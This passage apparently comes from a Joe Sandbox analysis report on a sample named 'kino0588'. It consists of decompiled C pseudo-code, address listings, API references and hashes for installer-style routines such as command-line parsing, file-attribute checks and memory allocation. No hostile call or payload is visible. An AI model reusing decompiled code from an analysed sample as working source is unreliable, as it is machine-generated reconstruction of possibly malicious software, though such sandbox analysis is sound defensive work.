			}











                                                                                                                                                                                                                                    0x00196229
                                                                                                                                                                                                                                    0x00196230
                                                                                                                                                                                                                                    0x00196247
                                                                                                                                                                                                                                    0x0019626a
                                                                                                                                                                                                                                    0x00196272
                                                                                                                                                                                                                                    0x00196249
                                                                                                                                                                                                                                    0x00196255
                                                                                                                                                                                                                                    0x0019625f
                                                                                                                                                                                                                                    0x00196264
                                                                                                                                                                                                                                    0x00196264
                                                                                                                                                                                                                                    0x00196284

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0019623F
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                      • Part of subcall function 00196285: GetLastError.KERNEL32(00195BBC), ref: 00196285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 381621628-0
                                                                                                                                                                                                                                    • Opcode ID: b30c813a00e17a1608beaa7f4f09dc76bfe2090ed4fc7354f7fa2703307ef5be
                                                                                                                                                                                                                                    • Instruction ID: 68c16bdb20fab584b5369e24277ff8ef1ce7b7b9e1d652d15e35e545aeaa5961
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b30c813a00e17a1608beaa7f4f09dc76bfe2090ed4fc7354f7fa2703307ef5be
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54F05EB0604208ABEF50EB749D06FBE76A8DBA4700F40046AB986D6191EF749D8586A4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00194B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00194B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x198d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x198d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x198d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x198d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x198d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x198d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x198d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                                                    0x00194b66
                                                                                                                                                                                                                                    0x00194b74
                                                                                                                                                                                                                                    0x00194b98
                                                                                                                                                                                                                                    0x00194ba0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194bac
                                                                                                                                                                                                                                    0x00194ba4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194ba4
                                                                                                                                                                                                                                    0x00194b78
                                                                                                                                                                                                                                    0x00194b7e
                                                                                                                                                                                                                                    0x00194b84
                                                                                                                                                                                                                                    0x00194b8a
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00194FA1,00000000), ref: 00194B98
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                                                    • Opcode ID: 551ef7f87c154d106f72d0c9832baceb85a56927cbbc079f045b7e896a5c4fba
                                                                                                                                                                                                                                    • Instruction ID: cdf7869d556c9a5f4b773a289d0abd65cf0ab7f182c3ae392afad3a78e239af0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 551ef7f87c154d106f72d0c9832baceb85a56927cbbc079f045b7e896a5c4fba
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF01271500B089FCB759FB9CC01A52BBE4AB96365310092E956FD2194DB31A449CBD0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001966AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E001966AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                                                    0x001966b1
                                                                                                                                                                                                                                    0x001966ba
                                                                                                                                                                                                                                    0x001966c7
                                                                                                                                                                                                                                    0x001966bc
                                                                                                                                                                                                                                    0x001966be
                                                                                                                                                                                                                                    0x001966be

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00194777,?,00194E38,?), ref: 001966B1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                    • Opcode ID: 138b2ab0220a6230543d6b93d167603d340606f698274b623eaa49df22d43a7d
                                                                                                                                                                                                                                    • Instruction ID: 677533e7effcc0405abe257e4df3387e9b52e15896eafb90dc7fbeb2b0588b59
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 138b2ab0220a6230543d6b93d167603d340606f698274b623eaa49df22d43a7d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6B09276626440426E2006356C295562841ABC123A7E81B91F032C05E0CB3EC89AD054
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00194CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00194CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x00194caa
                                                                                                                                                                                                                                    0x00194cb1

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 00194CAA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                                                    • Opcode ID: ce2814afb76e629af24c0755bf0a861a0f51d2e31a18393bcc1a42369b20c212
                                                                                                                                                                                                                                    • Instruction ID: d610969a2d7c6650ab7080568208f53f4440365aaba8031c676ec6162b3da027
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce2814afb76e629af24c0755bf0a861a0f51d2e31a18393bcc1a42369b20c212
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50B0123204420CB7CF001FC6EC09F853F1DEBC4761F580001F60C454508A73946086D7
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00194CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00194CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x00194cc8
                                                                                                                                                                                                                                    0x00194ccf

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                                                                                                                    • Opcode ID: 44e2b2ac5e442d997b81313d89e8561afdf80c25c8afa52f4292b1efe38b100e
                                                                                                                                                                                                                                    • Instruction ID: 017e858a4e221428a1650c5ae715a3a465234a944634a0f4517ba6c183ae78c6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44e2b2ac5e442d997b81313d89e8561afdf80c25c8afa52f4292b1efe38b100e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8B0123100010CB78F001B46EC088453F1DDBC02607440011F50C414218B33985185C6
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00195C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E00195C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x198004; // 0x21bd9a3c
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00196CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00196E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x198004; // 0x21bd9a3c
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0019597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E001944B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x199124 = E00196285();
									_t75 = 0;
								}
								return E00196CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E001944B9(0, 0x521, 0x191140, 0, 0x40, 0);
												_t85 =  *0x198588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0019667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0019667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00195C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00191680(0x198c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0019667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0019667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x198a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00195C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x198b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x198a3a;
																}
																E00191680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0019658A(_t218, 0x104, 0x191140);
																if(E001931E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x198a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x198a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x198a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x198a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x198a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x199a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x199a2c =  *0x199a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x198d48 =  *0x198d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x199a2c =  *0x199a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x199a2c =  *0x199a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x198d48 =  *0x198d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x199a2c =  *0x199a2c | 0x00000004;
																										L70:
																										 *0x198a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x199a2c = 3;
																	 *0x198a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x198a2c != 0 &&  *0x198b3e == 0) {
						if(GetModuleFileNameA( *0x199a3c, 0x198b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E001966C8(0x198b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                                                    0x00195c9e
                                                                                                                                                                                                                                    0x00195ca9
                                                                                                                                                                                                                                    0x00195cb0
                                                                                                                                                                                                                                    0x00195cb3
                                                                                                                                                                                                                                    0x00195cb6
                                                                                                                                                                                                                                    0x00195cb7
                                                                                                                                                                                                                                    0x00195cb8
                                                                                                                                                                                                                                    0x00195cbd
                                                                                                                                                                                                                                    0x00196204
                                                                                                                                                                                                                                    0x00195ccb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195ccb
                                                                                                                                                                                                                                    0x00195cd3
                                                                                                                                                                                                                                    0x00195cd7
                                                                                                                                                                                                                                    0x00195cf4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195cf4
                                                                                                                                                                                                                                    0x00195cf8
                                                                                                                                                                                                                                    0x00195d00
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d06
                                                                                                                                                                                                                                    0x00195d06
                                                                                                                                                                                                                                    0x00195d0e
                                                                                                                                                                                                                                    0x00195d10
                                                                                                                                                                                                                                    0x00195d12
                                                                                                                                                                                                                                    0x00195d14
                                                                                                                                                                                                                                    0x00195d15
                                                                                                                                                                                                                                    0x00195d17
                                                                                                                                                                                                                                    0x00195d49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d19
                                                                                                                                                                                                                                    0x00195d19
                                                                                                                                                                                                                                    0x00195d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d3f
                                                                                                                                                                                                                                    0x00195d3f
                                                                                                                                                                                                                                    0x00195d4b
                                                                                                                                                                                                                                    0x00195d4b
                                                                                                                                                                                                                                    0x00195d4f
                                                                                                                                                                                                                                    0x00195d8d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d93
                                                                                                                                                                                                                                    0x00195d93
                                                                                                                                                                                                                                    0x00195d9a
                                                                                                                                                                                                                                    0x00195d9d
                                                                                                                                                                                                                                    0x00195d9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d9e
                                                                                                                                                                                                                                    0x00195d51
                                                                                                                                                                                                                                    0x00195d5b
                                                                                                                                                                                                                                    0x00195d72
                                                                                                                                                                                                                                    0x001960fb
                                                                                                                                                                                                                                    0x001960fb
                                                                                                                                                                                                                                    0x00196207
                                                                                                                                                                                                                                    0x0019620a
                                                                                                                                                                                                                                    0x0019620b
                                                                                                                                                                                                                                    0x0019620e
                                                                                                                                                                                                                                    0x00196217
                                                                                                                                                                                                                                    0x00195d78
                                                                                                                                                                                                                                    0x00195d78
                                                                                                                                                                                                                                    0x00195d80
                                                                                                                                                                                                                                    0x00195d83
                                                                                                                                                                                                                                    0x00195d84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d84
                                                                                                                                                                                                                                    0x00195d5d
                                                                                                                                                                                                                                    0x00195d5f
                                                                                                                                                                                                                                    0x00195d62
                                                                                                                                                                                                                                    0x00195d68
                                                                                                                                                                                                                                    0x00195d64
                                                                                                                                                                                                                                    0x00195d64
                                                                                                                                                                                                                                    0x00195d64
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d62
                                                                                                                                                                                                                                    0x00195d5b
                                                                                                                                                                                                                                    0x00195d4f
                                                                                                                                                                                                                                    0x00195d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195d9f
                                                                                                                                                                                                                                    0x00195d9f
                                                                                                                                                                                                                                    0x00195da5
                                                                                                                                                                                                                                    0x00195dab
                                                                                                                                                                                                                                    0x00195dba
                                                                                                                                                                                                                                    0x00196218
                                                                                                                                                                                                                                    0x0019621d
                                                                                                                                                                                                                                    0x00196220
                                                                                                                                                                                                                                    0x00196221
                                                                                                                                                                                                                                    0x00196229
                                                                                                                                                                                                                                    0x00196230
                                                                                                                                                                                                                                    0x00196247
                                                                                                                                                                                                                                    0x0019626a
                                                                                                                                                                                                                                    0x00196272
                                                                                                                                                                                                                                    0x00196249
                                                                                                                                                                                                                                    0x00196255
                                                                                                                                                                                                                                    0x0019625f
                                                                                                                                                                                                                                    0x00196264
                                                                                                                                                                                                                                    0x00196264
                                                                                                                                                                                                                                    0x00196284
                                                                                                                                                                                                                                    0x00195dc0
                                                                                                                                                                                                                                    0x00195dc0
                                                                                                                                                                                                                                    0x00195dca
                                                                                                                                                                                                                                    0x00195e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195dcc
                                                                                                                                                                                                                                    0x00195dce
                                                                                                                                                                                                                                    0x00195e24
                                                                                                                                                                                                                                    0x00195e24
                                                                                                                                                                                                                                    0x00195e2c
                                                                                                                                                                                                                                    0x00195e47
                                                                                                                                                                                                                                    0x00195e4a
                                                                                                                                                                                                                                    0x001961d2
                                                                                                                                                                                                                                    0x001961e2
                                                                                                                                                                                                                                    0x001961e7
                                                                                                                                                                                                                                    0x001961ee
                                                                                                                                                                                                                                    0x001961f1
                                                                                                                                                                                                                                    0x001961f1
                                                                                                                                                                                                                                    0x001961f8
                                                                                                                                                                                                                                    0x001961f8
                                                                                                                                                                                                                                    0x00195e50
                                                                                                                                                                                                                                    0x00195e53
                                                                                                                                                                                                                                    0x00196109
                                                                                                                                                                                                                                    0x0019611f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196125
                                                                                                                                                                                                                                    0x00196137
                                                                                                                                                                                                                                    0x0019613a
                                                                                                                                                                                                                                    0x0019613c
                                                                                                                                                                                                                                    0x0019613e
                                                                                                                                                                                                                                    0x0019613e
                                                                                                                                                                                                                                    0x00196141
                                                                                                                                                                                                                                    0x00196141
                                                                                                                                                                                                                                    0x00196143
                                                                                                                                                                                                                                    0x00196144
                                                                                                                                                                                                                                    0x0019614a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196150
                                                                                                                                                                                                                                    0x00196152
